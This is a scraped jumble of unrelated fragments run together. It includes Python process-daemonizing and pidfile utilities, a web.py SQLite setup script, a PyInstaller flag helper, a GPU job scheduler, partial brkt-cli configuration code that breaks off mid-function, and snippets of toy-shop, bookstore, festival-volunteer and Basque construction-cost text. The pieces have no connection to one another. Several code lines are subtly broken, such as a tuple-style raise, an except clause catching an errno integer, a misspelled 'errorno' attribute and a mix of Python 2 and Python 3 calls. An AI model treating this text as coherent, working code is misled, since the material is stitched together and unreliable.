from __future__ import unicode_literals, absolute_import, print_function import os import sys import math import errno import atexit import importlib import signal as _signal import numbers import itertools try: from io import UnsupportedOperation FILENO_ERRORS = (AttributeError, ValueError, UnsupportedOperation) except ImportError: # pragma: no cover # Py2 FILENO_ERRORS = (AttributeError, ValueError) # noqa def uniq(it): """Return all unique elements in ``it``, preserving order.""" seen = set() return (seen.add(obj) or obj for obj in it if obj not in seen) def get_errno(exc): """:exc:`socket.error` and :exc:`IOError` first got the ``.errno`` attribute in Py2.7""" try: return exc.errno except AttributeError: try: # e.args = (errno, reason) if isinstance(exc.args, tuple) and len(exc.args) == 2: return exc.args[0] except AttributeError: pass return 0 def try_import(module, default=None): """Try to import and return module, or return None if the module does not exist.""" try: return importlib.import_module(module) except ImportError: return default def fileno(f): if isinstance(f, numbers.Integral): return f return f.fileno() def maybe_fileno(f): """Get object fileno, or :const:`None` if not defined.""" try: return fileno(f) except FILENO_ERRORS: pass class LockFailed(Exception): """Raised if a pidlock can't be acquired.""" EX_CANTCREAT = getattr(os, 'EX_CANTCREAT', 73) EX_FAILURE = 1 PIDFILE_FLAGS = os.O_CREAT | os.O_EXCL | os.O_WRONLY PIDFILE_MODE = ((os.R_OK | os.W_OK) << 6) | ((os.R_OK) << 3) | ((os.R_OK)) PIDLOCKED = """ERROR: Pidfile ({0}) already exists. Seems we're already running? (pid: {1})""" def get_fdmax(default=None): """Return the maximum number of open file descriptors on this system. :keyword default: Value returned if there's no file descriptor limit. """ try: return os.sysconf('SC_OPEN_MAX') except Exception: pass if resource is None: # Windows return default fdmax = resource.getrlimit(resource.RLIMIT_NOFILE)[1] if fdmax == resource.RLIM_INFINITY: return default return fdmax class Pidfile(object): """Pidfile This is the type returned by :func:`create_pidlock`. TIP: Use the :func:`create_pidlock` function instead, which is more convenient and also removes stale pidfiles (when the process holding the lock is no longer running). """ #: Path to the pid lock file. path = None def __init__(self, path): self.path = os.path.abspath(path) def acquire(self): """Acquire lock.""" try: self.write_pid() except OSError as exc: raise (LockFailed, LockFailed(str(exc)), sys.exc_info()[2]) return self __enter__ = acquire def is_locked(self): """Return true if the pid lock exists.""" return os.path.exists(self.path) def release(self, *args): """Release lock.""" self.remove() __exit__ = release def read_pid(self): """Read and return the current pid.""" try: with open(self.path, 'r') as fh: line = fh.readline() if line.strip() == line: # must contain '\n' raise ValueError( 'Partial or invalid pidfile {0.path}'.format(self)) try: return int(line.strip()) except ValueError: raise ValueError( 'pidfile {0.path} contents invalid.'.format(self)) except errno.ENOENT: pass def remove(self): """Remove the lock.""" try: os.unlink(self.path) except (errno.ENOENT, errno.EACCES): pass def remove_if_stale(self): """Remove the lock if the process is not running. (does not respond to signals).""" try: pid = self.read_pid() except ValueError: print('Broken pidfile found. Removing it.', file=sys.stderr) self.remove() return True if not pid: self.remove() return True if not pid_exists(pid): print('Stale pidfile exists. Removing it.', file=sys.stderr) self.remove() return True return False def write_pid(self): pid = os.getpid() content = '{0}\n'.format(pid) pidfile_fd = os.open(self.path, PIDFILE_FLAGS, PIDFILE_MODE) pidfile = os.fdopen(pidfile_fd, 'w') try: pidfile.write(content) # flush and sync so that the re-read below works. pidfile.flush() try: os.fsync(pidfile_fd) except AttributeError: # pragma: no cover pass finally: pidfile.close() rfh = open(self.path) try: if rfh.read() != content: raise LockFailed( "Inconsistency: Pidfile content doesn't match at re-read") finally: rfh.close() def create_pidlock(pidfile): """Create and verify pidfile. If the pidfile already exists the program exits with an error message, however if the process it refers to is not running anymore, the pidfile is deleted and the program continues. This function will automatically install an :mod:`atexit` handler to release the lock at exit, you can skip this by calling :func:`_create_pidlock` instead. :returns: :class:`Pidfile`. **Example**: .. code-block:: python pidlock = create_pidlock('/var/run/app.pid') """ pidlock = _create_pidlock(pidfile) atexit.register(pidlock.release) return pidlock def _create_pidlock(pidfile): pidlock = Pidfile(pidfile) if pidlock.is_locked() and not pidlock.remove_if_stale(): print(PIDLOCKED.format(pidfile, pidlock.read_pid()), file=sys.stderr) raise SystemExit(EX_CANTCREAT) pidlock.acquire() return pidlock resource = try_import('resource') pwd = try_import('pwd') grp = try_import('grp') DAEMON_UMASK = 0 DAEMON_WORKDIR = '/' if hasattr(os, 'closerange'): def close_open_fds(keep=None): # must make sure this is 0-inclusive (Issue #1882) keep = list(uniq(sorted( f for f in map(maybe_fileno, keep or []) if f is not None ))) maxfd = get_fdmax(default=2048) kL, kH = iter([-1] + keep), iter(keep + [maxfd]) for low, high in itertools.izip_longest(kL, kH): if low + 1 != high: os.closerange(low + 1, high) else: def close_open_fds(keep=None): # noqa keep = [maybe_fileno(f) for f in (keep or []) if maybe_fileno(f) is not None] for fd in reversed(range(get_fdmax(default=2048))): if fd not in keep: try: os.close(fd) except errno.EBADF: pass class DaemonContext(object): _is_open = False def __init__(self, pidfile=None, workdir=None, umask=None, fake=False, after_chdir=None, **kwargs): self.workdir = workdir or DAEMON_WORKDIR self.umask = DAEMON_UMASK if umask is None else umask self.fake = fake self.after_chdir = after_chdir self.stdfds = (sys.stdin, sys.stdout, sys.stderr) def redirect_to_null(self, fd): if fd is not None: dest = os.open(os.devnull, os.O_RDWR) os.dup2(dest, fd) def open(self): if not self._is_open: if not self.fake: self._detach() os.chdir(self.workdir) os.umask(self.umask) if self.after_chdir: self.after_chdir() close_open_fds(self.stdfds) for fd in self.stdfds: self.redirect_to_null(maybe_fileno(fd)) self._is_open = True __enter__ = open def close(self, *args): if self._is_open: self._is_open = False __exit__ = close def _detach(self): if os.fork() == 0: # first child os.setsid() # create new session if os.fork() > 0: # second child os._exit(0) else: os._exit(0) return self def detached(logfile=None, pidfile=None, uid=None, gid=None, umask=0, workdir=None, fake=False, **opts): """Detach the current process in the background (daemonize). :keyword logfile: Optional log file. The ability to write to this file will be verified before the process is detached. :keyword pidfile: Optional pidfile. The pidfile will not be created, as this is the responsibility of the child. But the process will exit if the pid lock exists and the pid written is still running. :keyword uid: Optional user id or user name to change effective privileges to. :keyword gid: Optional group id or group name to change effective privileges to. :keyword umask: Optional umask that will be effective in the child process. :keyword workdir: Optional new working directory. :keyword fake: Don't actually detach, intented for debugging purposes. :keyword \*\*opts: Ignored. **Example**: .. code-block:: python from celery.platforms import detached, create_pidlock with detached(logfile='/var/log/app.log', pidfile='/var/run/app.pid', uid='nobody'): # Now in detached child process with effective user set to nobody, # and we know that our logfile can be written to, and that # the pidfile is not locked. pidlock = create_pidlock('/var/run/app.pid') # Run the program program.run(logfile='/var/log/app.log') """ if not resource: raise RuntimeError('This platform does not support detach.') workdir = os.getcwd() if workdir is None else workdir signals.reset('SIGCLD') # Make sure SIGCLD is using the default handler. maybe_drop_privileges(uid=uid, gid=gid) def after_chdir_do(): # Since without stderr any errors will be silently suppressed, # we need to know that we have access to the logfile. logfile and open(logfile, 'a').close() # Doesn't actually create the pidfile, but makes sure it's not stale. if pidfile: _create_pidlock(pidfile).release() return DaemonContext( umask=umask, workdir=workdir, fake=fake, after_chdir=after_chdir_do, ) def parse_uid(uid): """Parse user id. uid can be an integer (uid) or a string (user name), if a user name the uid is taken from the system user registry. """ try: return int(uid) except ValueError: try: return pwd.getpwnam(uid).pw_uid except (AttributeError, KeyError): raise KeyError('User does not exist: {0}'.format(uid)) def parse_gid(gid): """Parse group id. gid can be an integer (gid) or a string (group name), if a group name the gid is taken from the system group registry. """ try: return int(gid) except ValueError: try: return grp.getgrnam(gid).gr_gid except (AttributeError, KeyError): raise KeyError('Group does not exist: {0}'.format(gid)) def _setgroups_hack(groups): """:fun:`setgroups` may have a platform-dependent limit, and it is not always possible to know in advance what this limit is, so we use this ugly hack stolen from glibc.""" groups = groups[:] while 1: try: return os.setgroups(groups) except ValueError: # error from Python's check. if len(groups) <= 1: raise groups[:] = groups[:-1] except OSError as exc: # error from the OS. if exc.errno != errno.EINVAL or len(groups) <= 1: raise groups[:] = groups[:-1] def setgroups(groups): """Set active groups from a list of group ids.""" max_groups = None try: max_groups = os.sysconf('SC_NGROUPS_MAX') except Exception: pass try: return _setgroups_hack(groups[:max_groups]) except OSError as exc: if exc.errno != errno.EPERM: raise if any(group not in groups for group in os.getgroups()): # we shouldn't be allowed to change to this group. raise def initgroups(uid, gid): """Compat version of :func:`os.initgroups` which was first added to Python 2.7.""" if not pwd: # pragma: no cover return username = pwd.getpwuid(uid)[0] if hasattr(os, 'initgroups'): # Python 2.7+ return os.initgroups(username, gid) groups = [gr.gr_gid for gr in grp.getgrall() if username in gr.gr_mem] setgroups(groups) def setgid(gid): """Version of :func:`os.setgid` supporting group names.""" os.setgid(parse_gid(gid)) def setuid(uid): """Version of :func:`os.setuid` supporting usernames.""" os.setuid(parse_uid(uid)) def maybe_drop_privileges(uid=None, gid=None): """Change process privileges to new user/group. If UID and GID is specified, the real user/group is changed. If only UID is specified, the real user is changed, and the group is changed to the users primary group. If only GID is specified, only the group is changed. """ if sys.platform == 'win32': return if os.geteuid(): # no point trying to setuid unless we're root. if not os.getuid(): raise AssertionError('contact support') uid = uid and parse_uid(uid) gid = gid and parse_gid(gid) if uid: # If GID isn't defined, get the primary GID of the user. if not gid and pwd: gid = pwd.getpwuid(uid).pw_gid # Must set the GID before initgroups(), as setgid() # is known to zap the group list on some platforms. # setgid must happen before setuid (otherwise the setgid operation # may fail because of insufficient privileges and possibly stay # in a privileged group). setgid(gid) initgroups(uid, gid) # at last: setuid(uid) # ... and make sure privileges cannot be restored: try: setuid(0) except OSError as exc: if get_errno(exc) != errno.EPERM: raise pass # Good: cannot restore privileges. else: raise RuntimeError( 'non-root user able to restore privileges after setuid.') else: gid and setgid(gid) if uid and (not os.getuid()) and not (os.geteuid()): raise AssertionError('Still root uid after drop privileges!') if gid and (not os.getgid()) and not (os.getegid()): raise AssertionError('Still root gid after drop privileges!') class Signals(object): """Convenience interface to :mod:`signals`. If the requested signal is not supported on the current platform, the operation will be ignored. **Examples**: .. code-block:: python >>> from celery.platforms import signals >>> from proj.handlers import my_handler >>> signals['INT'] = my_handler >>> signals['INT'] my_handler >>> signals.supported('INT') True >>> signals.signum('INT') 2 >>> signals.ignore('USR1') >>> signals['USR1'] == signals.ignored True >>> signals.reset('USR1') >>> signals['USR1'] == signals.default True >>> from proj.handlers import exit_handler, hup_handler >>> signals.update(INT=exit_handler, ... TERM=exit_handler, ... HUP=hup_handler) """ ignored = _signal.SIG_IGN default = _signal.SIG_DFL if hasattr(_signal, 'setitimer'): def arm_alarm(self, seconds): _signal.setitimer(_signal.ITIMER_REAL, seconds) else: # pragma: no cover try: from itimer import alarm as _itimer_alarm # noqa except ImportError: def arm_alarm(self, seconds): # noqa _signal.alarm(math.ceil(seconds)) else: # pragma: no cover def arm_alarm(self, seconds): # noqa return _itimer_alarm(seconds) # noqa def reset_alarm(self): return _signal.alarm(0) def supported(self, signal_name): """Return true value if ``signal_name`` exists on this platform.""" try: return self.signum(signal_name) except AttributeError: pass def signum(self, signal_name): """Get signal number from signal name.""" if isinstance(signal_name, numbers.Integral): return signal_name if not isinstance(signal_name, basestring) \ or not signal_name.isupper(): raise TypeError('signal name must be uppercase string.') if not signal_name.startswith('SIG'): signal_name = 'SIG' + signal_name return getattr(_signal, signal_name) def reset(self, *signal_names): """Reset signals to the default signal handler. Does nothing if the platform doesn't support signals, or the specified signal in particular. """ self.update((sig, self.default) for sig in signal_names) def ignore(self, *signal_names): """Ignore signal using :const:`SIG_IGN`. Does nothing if the platform doesn't support signals, or the specified signal in particular. """ self.update((sig, self.ignored) for sig in signal_names) def __getitem__(self, signal_name): return _signal.getsignal(self.signum(signal_name)) def __setitem__(self, signal_name, handler): """Install signal handler. Does nothing if the current platform doesn't support signals, or the specified signal in particular. """ try: _signal.signal(self.signum(signal_name), handler) except (AttributeError, ValueError): pass def update(self, _d_=None, **sigmap): """Set signal handlers from a mapping.""" for signal_name, handler in dict(_d_ or {}, **sigmap).items(): self[signal_name] = handler signals = Signals() def pid_exists(pid): """Check whether pid exists in the current process table. UNIX only. """ if pid < 0: return False if pid == 0: # According to "man 2 kill" PID 0 refers to every process # in the process group of the calling process. # On certain systems 0 is a valid PID but we have no way # to know that in a portable fashion. raise ValueError('invalid PID 0') try: os.kill(pid, 0) except OSError as err: if err.errno == errno.ESRCH: # ESRCH == No such process return False elif err.errno == errno.EPERM: # EPERM clearly means there's a process to deny access to return True else: # According to "man 2 kill" possible error values are # (EINVAL, EPERM, ESRCH) raise else: return True
Pit-a-Pat Toys Visit the channel where you can quickly see new toys! Email: webmaster@youngtoys.com /Tel : 02-557-8330 Fax : 02-554-6715Copyright ⓒ YOUNGTOYS,INC. All rights reserved.
import web import os.path import sys import shutil DATABASE = 'db/libros.sqlite' def _touch(fname, times=None): fhandle = open(fname, 'a') try: os.utime(fname, times) finally: fhandle.close() return True return False def _init(): import sqlite3 conn = sqlite3.connect(DATABASE) c = conn.cursor() from tables import items, item1, users, admin, org, nif, grades, groups, tickets, students, books, default_grade, default_group c.execute(items) c.execute(item1) c.execute(users) c.execute(admin) c.execute(org) c.execute(nif) c.execute(grades) c.execute(default_grade) c.execute(groups) c.execute(default_group) c.execute(tickets) c.execute(students) c.execute(books) conn.commit() conn.close() def _copy_blank(): shutil.copy2(DATABASE, 'db/libros-vacia.sqlite') if os.path.isfile(DATABASE): DB = web.database(dbn='sqlite', db=DATABASE) else: print DATABASE, 'file not found.' if _touch(DATABASE): print 'initializing database', DATABASE, '...' _init() _copy_blank() DB = web.database(dbn='sqlite', db=DATABASE) else: print 'Error crerating', DATABASE, 'file.' sys.exit(1) cache = False
Thank you for Volunteering to help with SMOY Fest! Please fill in the fields below, select a booth, and select the days/times (shifts) you are able to work. Click the 'Volunteer' button to complete your signup. To volunteer for another booth, just select the booth and shifts and click the 'Volunteer' button again. If you have already signed up to volunteer, you only need to enter your First Name, Email, and the Captcha Number below and click the 'Volunteer' button to edit your current shifts. Select a booth to add additional shifts. 2019 Volunteer signup will be available a few months prior to the festival. ** Your contact information will not be made public and will only be used by Booth Chairs to contact you.
import os import subprocess import sys import controller def pyversion(installdir): config = controller.getConfig() sys.path.insert(0, installdir) from PyInstaller import get_version return float(get_version()[:3]) def getflags(fname): config = controller.getConfig() flags=[] flags.append(sys.executable) # Python executable to run pyinstaller flags.append(os.path.join(config['pyidir'], config['pyscript'])) if config['noconfirm']: flags.append('--noconfirm') if config['singlefile']: flags.append('--onefile') if config['ascii']: flags.append('--ascii') if config['windowed']: flags.append('--noconsole') if config['upxdir'] != '': flags.append('--upx-dir=' + config['upxdir']) if pyversion(config['pyidir']) == 2.1: flags.append('--distpath=' + os.path.dirname(fname)) # Output to same dir as script. else: flags.append('--out=' + os.path.dirname(fname)) flags.append(fname) return(flags)
Babies First Books does not accept orders by phone, chat, email, fax or mail. Also, please note that Customer Service cannot offer any Sales, Compatibility or Technical Support. For more information please visit.
#!/usr/bin/env python3 import argparse import json import time import subprocess import fcntl import errno import datetime import os import sys import signal import threading import shlex # CONSTANTS - Scheduler settings SEC_DELAY = 3 PATH = "/tmp/" GPU_INFO_FILE = os.path.join(PATH, "gpu_scheduler_info") DEFAULT_GPU_COUNT = 4 KILL_DELAY_SEC = 3 # CONSTANTS - Data keys GPU_AVAIL = 'avail' GPU_USER = 'user' GPU_TASK = 'task' GPU_TASK_PID = 'task_pid' GPU_TASK_START = 'task_start' GPU_NAME = 'gpu_name' # CONSTANTS KILL = 0 TERMINATE = 1 WARN = 2 # GLOBAL VARIABLES TASK_SIGNAL = WARN def get_args(): parser = argparse.ArgumentParser() parser.add_argument("-gc", "--gpu_count", type=int, default=1, help="The count of required GPUs for specified task.") parser.add_argument("-i", "--init", nargs="+", type=int, help="""Initializes gpu info file. List of numbers is expected, where first number is total count of GPUs and the rest of the numbers denotes unavailable GPUs. e.g -i 5 3 4 means that total count of GPUs is 5 and GPU 3 and 4 are currently unavailable.""") parser.add_argument("-v", "--verbose", action="store_true", help="Prints info about the process, when the task is completed.") parser.add_argument("-o", "--out", nargs="?", type=argparse.FileType('w'), default=sys.stdout, help="The name of the file, which will be used to store stdout. The default file is sys.stdout.") parser.add_argument("-e", "--err", nargs="?", type=argparse.FileType('w'), default=sys.stderr, help="The name of the file, which will be used to store stderr. The default file is sys.stderr.") parser.add_argument("-pg", "--prefered_gpu", type=int, help="If possible, prefered GPU is assigned to the task, otherwise is assigned random free GPU.") parser.add_argument("-fg", "--forced_gpu", type=int, help="Wait until specified GPU is free.") parser.add_argument("-s", "--status", action='store_true', help="Show info about GPU usage - user/GPU/taskPID/start") parser.add_argument("-rg", "--release_gpu", type=int, nargs='+', help="Releases GPUs according their indices. e.g -rg 0 2 will release GPU 0 and 2.") parser.add_argument("task", nargs='?', help="The quoted task with arguments which will be started on free GPUs as soon as possible.") return parser.parse_args() # main function def run_task(gpu_info_file, args): is_waiting = False while True: try: lock_file(gpu_info_file) free_gpu = get_free_gpu(gpu_info_file) if len(free_gpu) >= args.gpu_count: try: if args.prefered_gpu is not None: free_gpu = get_prefered_gpu(free_gpu, args.prefered_gpu) if args.forced_gpu is not None: free_gpu = get_prefered_gpu(free_gpu, args.forced_gpu) forced_gpu_free = check_forced_free(free_gpu, args.forced_gpu) if not forced_gpu_free: if not is_waiting: is_waiting = True print("Scheduler (PID: {}) is waiting for GPU {}.".format(os.getpid(), args.forced_gpu)) continue # select required count of free gpu, which will be passed to the task free_gpu = free_gpu[0:args.gpu_count] # lock used gpu set_occupied_gpu(gpu_info_file, free_gpu) unlock_file(gpu_info_file) # set enviromental variable GPU to cuda[index of allocated GPU] cuda = set_env_vars(free_gpu) dt_before = datetime.datetime.now() # parse string of args to list task = prepare_args(args.task) # replace char '#' with port number task = insert_portshift(task, free_gpu[0]) # run required task p = subprocess.Popen(task, stdout=args.out, stderr=args.err, preexec_fn=before_new_subprocess) # The second Ctrl-C kill the subprocess signal.signal(signal.SIGINT, lambda signum, frame: stop_subprocess(p, gpu_info_file, free_gpu)) set_additional_info(gpu_info_file, free_gpu, os.getlogin(), task, p.pid, get_formated_dt(dt_before), cuda) print("GPU: {}\nSCH PID: {}\nTASK PID: {}".format(cuda, os.getpid(), p.pid)) print("SCH PGID: {}\nTASK PGID: {}".format(os.getpgid(os.getpid()), os.getpgid(p.pid))) p.wait() dt_after = datetime.datetime.now() # info message if args.verbose: print("\ntask: {}\nstdout: {}\nstderr: {}\nstart: {}\nend: {}\ntotal time: {}\n".format( task, args.out.name, args.err.name, get_formated_dt(dt_before), get_formated_dt(dt_after), get_time_duration(dt_before, dt_after))) break # make sure the GPU is released even on interrupts finally: set_free_gpu(gpu_info_file, free_gpu) unlock_file(gpu_info_file) time.sleep(1) else: unlock_file(gpu_info_file) time.sleep(SEC_DELAY) except IOError as e: handle_io_error(e) def before_new_subprocess(): signal.signal(signal.SIGINT, signal.SIG_IGN) os.setsid() def prepare_args(args): result = [] for a in args.split('\n'): if a != '': result.extend(shlex.split(a)) return result def stop_subprocess(process, gpu_file, gpu_to_release): """ This function take care of the Ctrl-C (SIGINT) signal. On the first Ctrl-C the warning is printed. On the second Ctrl-C the task is terminated. On the third Ctrl-C the task is killed. Delay between terminate and kill is specified in KILL_DELAY_SEC. """ def allow_kill_task(): global TASK_SIGNAL TASK_SIGNAL = KILL def check_process_liveness(process, max_time): if max_time <= 0 or (process.poll() is not None): allow_kill_task() else: threading.Timer(0.1, lambda: check_process_liveness(process, max_time - 0.1)).start() global TASK_SIGNAL if TASK_SIGNAL is KILL: pgid = os.getpgid(process.pid) print("\nThe task (PGID: {}) was killed.".format(pgid)) set_free_gpu(gpu_file, gpu_to_release) os.killpg(pgid, signal.SIGKILL) TASK_SIGNAL = None elif TASK_SIGNAL is TERMINATE: pgid = os.getpgid(process.pid) print("\nThe task (PGID: {}) was terminated.".format(pgid)) set_free_gpu(gpu_file, gpu_to_release) os.killpg(pgid, signal.SIGTERM) # send a second SIGTERM because of blocks os.killpg(pgid, signal.SIGTERM) check_process_liveness(process, KILL_DELAY_SEC) TASK_SIGNAL = None elif TASK_SIGNAL is WARN: pgid = os.getpgid(process.pid) print("\nNext Ctrl-C terminate the task (PGID: {}).".format(pgid)) TASK_SIGNAL = TERMINATE def check_forced_free(gpu_indices, forced): if gpu_indices: return gpu_indices[0] == forced return False def get_prefered_gpu(gpu_indices, prefered): """Move prefered GPU on a first position if it is available.""" if prefered in gpu_indices: gpu_indices.remove(prefered) return [prefered, ] + gpu_indices return gpu_indices def insert_portshift(task, task_id): port = 3600 + task_id * 100 task = list(map(lambda v: str(port) if v == '__num__' else v, task)) return task # decorators def access_gpu_file(func): def wrapper(f, *args, **kwargs): while True: try: lock_file(f) func(f, *args, **kwargs) unlock_file(f) break except IOError as e: handle_io_error(e) return wrapper def seek_to_start(func): def wrapper(f, *args, **kwargs): f.seek(0) result = func(f, *args, **kwargs) f.seek(0) return result return wrapper @access_gpu_file @seek_to_start def init_gpu_info_file(f, gpu_count, occupied_gpu): """ occupied_gpu - indices of GPUs which currently are not available gpu_count - total count of GPUs on a system """ gpu_states = [False if i in occupied_gpu else True for i in range(gpu_count)] f.truncate() data = {} data[GPU_AVAIL] = gpu_states init_to_none = lambda c: c * [None] data[GPU_USER] = init_to_none(gpu_count) data[GPU_TASK] = init_to_none(gpu_count) data[GPU_TASK_PID] = init_to_none(gpu_count) data[GPU_TASK_START] = init_to_none(gpu_count) data[GPU_NAME] = init_to_none(gpu_count) json.dump(data, f, indent=4, sort_keys=True) @seek_to_start def get_free_gpu(gpu_info_file): "Returns list of GPU indices which are available." gpu_states = json.load(gpu_info_file)[GPU_AVAIL] return [i for i, avail in enumerate(gpu_states) if avail] @seek_to_start def update_gpu_info(f, release_gpu, indices, user=None, task=None, proc_pid=None, start=None, gpu_name=None): gpu_data = json.load(f) f.seek(0) f.truncate() for i in range(len(gpu_data[GPU_AVAIL])): if i in indices: gpu_data[GPU_AVAIL][i] = release_gpu gpu_data[GPU_USER][i] = user gpu_data[GPU_TASK][i] = task gpu_data[GPU_TASK_PID][i] = proc_pid gpu_data[GPU_TASK_START][i] = start gpu_data[GPU_NAME][i] = gpu_name json.dump(gpu_data, f, indent=4, sort_keys=True) @access_gpu_file def set_additional_info(f, gpu_indices, user, task, proc_pid, start, gpu_name): update_gpu_info(f, False, gpu_indices, user, task, proc_pid, start, gpu_name) def set_occupied_gpu(f, occupied_gpu): """Locks currently unavailable GPUs.""" update_gpu_info(f, False, occupied_gpu) @access_gpu_file def set_free_gpu(f, free_gpu): """Releases GPUs""" update_gpu_info(f, True, free_gpu) def get_formated_dt(dt): """Returns the datetime object formated.""" return dt.strftime("%Y-%m-%d %H:%M:%S") def get_time_duration(before, after): """Returns the difference between two datetime objects in format: hours:minutes:seconds""" total_seconds = (after - before).seconds mins, secs = divmod(total_seconds, 60) hours, mins = divmod(mins, 60) return "{}:{}:{}".format(hours, mins, secs) def lock_file(f): """Locks the file.""" fcntl.flock(f, fcntl.LOCK_EX | fcntl.LOCK_NB) def unlock_file(f): """Unlocks the file.""" fcntl.flock(f, fcntl.LOCK_UN) def handle_io_error(e): if e.errno != errno.EAGAIN: raise e time.sleep(0.1) def set_env_vars(gpu_indices): """Sets enviromental variable GPU""" # currently is cupported just one gpu on task cuda = "cuda{}".format(gpu_indices[0]) os.environ['GPU'] = cuda return cuda def validate_args(args): if args.gpu_count != 1: print("Usage of multiple GPUs isn't supported yet. You must use just the one GPU for the task.") sys.exit(1) @seek_to_start def display_status(f): gpu_data = json.load(f) occupied = [i for i, avail in enumerate(gpu_data[GPU_AVAIL]) if not avail] free = [i for i, avail in enumerate(gpu_data[GPU_AVAIL]) if avail] if occupied: print("Currently used GPU:") print("-------------------") for i in occupied: print("GPU: {}\nUser: {}\nTask: {}\nTask PID: {}\nStarted: {}\n".format(gpu_data[GPU_NAME][i], gpu_data[GPU_USER][i], gpu_data[GPU_TASK][i], gpu_data[GPU_TASK_PID][i], gpu_data[GPU_TASK_START][i])) if free: print("Free GPU:") print("---------") for i in free: print("GPU {}".format(i)) else: print("No GPU available.") # run scheduler if __name__ == '__main__': mode = 'r+' need_init_gpuf = not(os.path.isfile(GPU_INFO_FILE)) if need_init_gpuf: mode = 'w+' with open(GPU_INFO_FILE, mode) as f: if need_init_gpuf: os.fchmod(f.fileno(), 0o777) init_gpu_info_file(f, DEFAULT_GPU_COUNT, []) # parse cli args args = get_args() validate_args(args) if args.init: init_gpu_info_file(f, args.init[0], args.init[1:]) if args.release_gpu: set_free_gpu(f, args.release_gpu) if args.status: display_status(f) if args.task: run_task(f, args)
There was a 0.2% rise in the Construction Costs Index in the Basque Country in December 2014 compared to the previous month, whilst the year-on-year rate for the same month fell by 0.6%, according to data provided by EUSTAT. In March, the sub-sectors of Building and Civil Works showed a similar evolution in the cost of their raw materials in relation to the previous month, with an increase of 0.2% in Building, and the cost of raw materials consumed in Civil Works rose by 0.1%. The year-on-year performance of both sub-sectors showed the same figures. Building raw material costs fell by 1.2%, whereas those for Civil Works recorded a 2.2% decrease. The prices of raw materials consumed by the sector that recorded the biggest increases in their year-on-year prices (March 2014 on March 2013) included those in the sectors of the Timber Industry and Electricity & Gas, which both rose by 1.2%. On the other hand, sectors that saw the biggest price reductions over the last twelve months in raw materials include the Oil Refining sector, which fell by 6.8%, Metallurgy, which was down 4.6%, and Electrical Equipment which was down by 2.4%.
# Copyright 2017 Bracket Computing, Inc. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"). # You may not use this file except in compliance with the License. # A copy of the License is located at # # https://github.com/brkt/brkt-cli/blob/master/LICENSE # # or in the "license" file accompanying this file. This file is # distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR # CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and # limitations under the License. import argparse import collections import errno import logging import os import os.path import shutil import sys import tempfile import yaml import brkt_cli from brkt_cli import argutil from brkt_cli.subcommand import Subcommand from brkt_cli.util import parse_endpoint, render_table_rows from brkt_cli.validation import ValidationError log = logging.getLogger(__name__) CONFIG_DIR = os.path.expanduser('~/.brkt') CONFIG_PATH = os.path.join(CONFIG_DIR, 'config') VERSION = 3 class InvalidOptionError(Exception): def __init__(self, option): self.option = option class UnknownEnvironmentError(Exception): def __init__(self, env): self.env = env class InvalidEnvironmentError(Exception): def __init__(self, missing_keys): self.missing_keys = missing_keys BRKT_HOSTED_ENV_NAME = 'brkt-hosted' def _bracket_environment_to_dict(benv): """Convert a BracketEnvironment object to a dictionary that can be stored in a config. :param benv a BracketEnvironment object :return a dictionary """ return { 'api-host': benv.api_host, 'api-port': benv.api_port, 'keyserver-host': benv.hsmproxy_host, 'keyserver-port': benv.hsmproxy_port, 'public-api-host': benv.public_api_host, 'public-api-port': benv.public_api_port, 'network-host': benv.network_host, 'network-port': benv.network_port, 'public-api-ca-cert-path': benv.public_api_ca_cert_path } def _bracket_environment_from_dict(d): """Convert a bracket environment from the config into a BracketEnvironment object :param d a dictionary :return a BracketEnvironment object """ benv = brkt_cli.BracketEnvironment() benv.api_host = d.get('api-host') benv.api_port = d.get('api-port') benv.hsmproxy_host = d.get('keyserver-host') benv.hsmproxy_port = d.get('keyserver-port') benv.public_api_host = d.get('public-api-host') benv.public_api_port = d.get('public-api-port') benv.network_host = d.get('network-host') benv.network_port = d.get('network-port') benv.public_api_ca_cert_path = d.get('public-api-ca-cert-path') return benv def _validate_environment(benv): """Make sure all the necessary attributes of an environment are set. :raises InvalidEnvironmentError """ attrs = ('api_host', 'hsmproxy_host', 'public_api_host', 'network_host') missing = [] for attr in attrs: if getattr(benv, attr) is None: missing.append(attr) if len(missing) > 0: raise InvalidEnvironmentError(missing) def _unlink_noraise(path): try: os.unlink(path) except OSError as e: if e.errorno == errno.ENOENT: pass else: log.exception("Failed unlinking %s", path) except: log.exception("Failed unlinking %s", path) class CLIConfig(object): """CLIConfig exposes an interface that subcommands can use to retrieve persistent configuration options. """ def __init__(self): self._config = { 'current-environment': None, 'environments': {}, 'options': {}, 'version': VERSION, 'internal': {} } self._add_prod_env() self._registered_options = collections.defaultdict(dict) def _get_env(self, env_name): if env_name not in self._config['environments']: raise UnknownEnvironmentError(env_name) d = self._config['environments'][env_name] return _bracket_environment_from_dict(d) def set_env(self, name, env): """Update the named environment. :param name the environment name (e.g. stage) :param env a BracketEnvironment instance """ d = _bracket_environment_to_dict(env) self._config['environments'][name] = d def get_current_env(self): """Return the current environment. :return a tuple of environment name, BracketEnvironment """ env_name = self._config['current-environment'] return env_name, self.get_env(env_name) def set_current_env(self, env_name): """Change the current environment :param env_name the named env """ env = self._get_env(env_name) _validate_environment(env) self._config['current-environment'] = env_name def get_env_meta(self): """Return all defined environments""" meta = {} for env_name in self._config['environments'].iterkeys(): meta[env_name] = { 'is_current': self._config['current-environment'] == env_name } return meta def get_env(self, env_name): """Return the named environment :param env_name a string :return a BracketEnvironment instance :raises UnknownEnvironmentError """ return self._get_env(env_name) def unset_env(self, env_name): """Delete the named environment :param env_name a string :raises UnknownEnvironmentError """ self._get_env(env_name) del self._config['environments'][env_name] if self._config['current-environment'] == env_name: self._config['current-environment'] = BRKT_HOSTED_ENV_NAME def _check_option(self, option): if option not in self._registered_options: raise InvalidOptionError(option) def register_option(self, option, desc): self._registered_options[option] = desc def registered_options(self): return self._registered_options def set_option(self, option, value): """Set the value for the supplied option. :param option a dot-delimited option string :param value the option value """ self._check_option(option) levels = option.split('.') attr = levels.pop() cur = self._config['options'] for level in levels: if level not in cur: cur[level] = {} cur = cur[level] cur[attr] = value def get_option(self, option, default=None): """Fetch the value for the supplied option. :param option a dot-delimited option string :param default the value to be returned if option is not present :return the option value """ self._check_option(option) levels = option.split('.') attr = levels.pop() cur = self._config['options'] for level in levels: if level not in cur: return default cur = cur[level] return cur.get(attr, default) def _remove_empty_dicts(self, h): to_remove = [] for k in h: if isinstance(h[k], dict): 